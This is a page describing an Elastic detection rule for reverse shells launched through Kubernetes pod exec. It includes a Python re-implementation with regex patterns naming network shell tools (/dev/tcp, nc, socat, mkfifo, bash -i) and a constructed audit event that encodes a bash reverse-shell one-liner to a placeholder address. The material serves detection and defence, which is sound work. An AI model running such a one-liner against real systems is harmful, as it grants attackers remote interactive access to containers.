Kubernetes Pod Exec Potential Reverse Shell

Elastic Detection Rules

Summary
This ES|QL-based rule watches Kubernetes audit logs for use of the pod exec subresource and analyzes the request URI. It URL-decodes the request, parses the command fragment, and reconstructs the executed shell command. The rule then applies high-signal regex patterns that resemble reverse-shell or bind-shell one-liners (e.g., /dev/tcp, /dev/udp, nc/ncat, socat, mkfifo, bash -i) to flag potential post-exploitation interactive access inside a Pod. Local health-check and benign debugging patterns are excluded to reduce noise. When matched, the rule maps to MITRE ATT&CK techniques for container administration commands and command and scripting interpreters, aiding investigations into potential command-and-control activity within Kubernetes. The rule is intended for Kubernetes environments where pod/container exec is sensitive, and it offers triage guidance, false-positive considerations, and remediation steps such as terminating sessions, rotating credentials, and tightening exec permissions.
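The decode, parse and match pipeline the summary describes, re-implemented in Python as an added example (this is not Elastic's ES|QL rule; the regex set, the loopback-probe exclusion and the sample audit events are simplified assumptions constructed for illustration):

```python
import re
from urllib.parse import urlsplit, parse_qs

# Illustrative regexes for the one-liner families the rule names (reduced set;
# the production ES|QL rule's patterns differ).
SHELL_PATTERN = re.compile(
    r"/dev/(tcp|udp)/|\b(nc|ncat|netcat)\b.*\s-[ce]\s|\bsocat\b.*\bexec:"
    r"|\bmkfifo\b|\b(ba)?sh\s+-i\b", re.IGNORECASE)
# Assumed benign exclusion: loopback probes via curl/wget/nc -z (local health checks).
BENIGN_LOCAL = re.compile(r"\b(curl|wget|nc\s+-z)\b.*\b(localhost|127\.0\.0\.1)\b")

def extract_exec_command(event: dict):
    """Reconstruct the command from a pod exec audit event; None if not an exec."""
    ref = event.get("objectRef", {})
    if ref.get("resource") != "pods" or ref.get("subresource") != "exec":
        return None
    # The API server receives one 'command=' parameter per argv element, in order;
    # parse_qs percent-decodes each value and maps '+' to a space (decode only once).
    argv = parse_qs(urlsplit(event.get("requestURI", "")).query).get("command", [])
    return " ".join(argv) if argv else None

def classify_exec(event: dict) -> str:
    """Return 'not_exec', 'benign', 'suspicious' or 'exec' for one audit event."""
    cmd = extract_exec_command(event)
    if cmd is None:
        return "not_exec"
    if BENIGN_LOCAL.search(cmd):
        return "benign"  # excluded before pattern matching, as the rule does
    return "suspicious" if SHELL_PATTERN.search(cmd) else "exec"

def _exec_event(pod: str, query: str) -> dict:
    # Build a constructed (not real) audit-log entry for a pod exec request.
    return {"verb": "create", "user": {"username": "dev-user"},
            "objectRef": {"resource": "pods", "subresource": "exec",
                          "namespace": "default", "name": pod},
            "requestURI": f"/api/v1/namespaces/default/pods/{pod}/exec?{query}"}

# Constructed samples: a bash /dev/tcp one-liner to a placeholder address, a loopback
# health probe, a plain directory listing, and a non-exec (log) request.
SAMPLE_EVENTS = [
    _exec_event("web-0", "command=bash&command=-c&command=bash+-i+%3E%26+%2Fdev%2Ftcp"
                         "%2F10.0.0.5%2F4444+0%3E%261&container=web&stdin=true&tty=true"),
    _exec_event("web-1", "command=sh&command=-c&command=curl+-sf+http%3A%2F%2Flocalhost"
                         "%3A8080%2Fhealthz&container=web"),
    _exec_event("web-2", "command=ls&command=-la&command=%2Fapp&container=web"),
    {"verb": "get", "objectRef": {"resource": "pods", "subresource": "log", "name": "web-3"},
     "requestURI": "/api/v1/namespaces/default/pods/web-3/log?container=web"},
]
```

Running `classify_exec` over `SAMPLE_EVENTS` yields suspicious, benign, exec and not_exec respectively; the reconstructed command string is what an analyst would pivot on during triage.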
Categories
  • Kubernetes
  • Containers
  • Endpoint
Data Sources
  • Pod
  • Container
  • Process
  • Command
ATT&CK Techniques
  • T1609
  • T1059
Created: 2026-04-23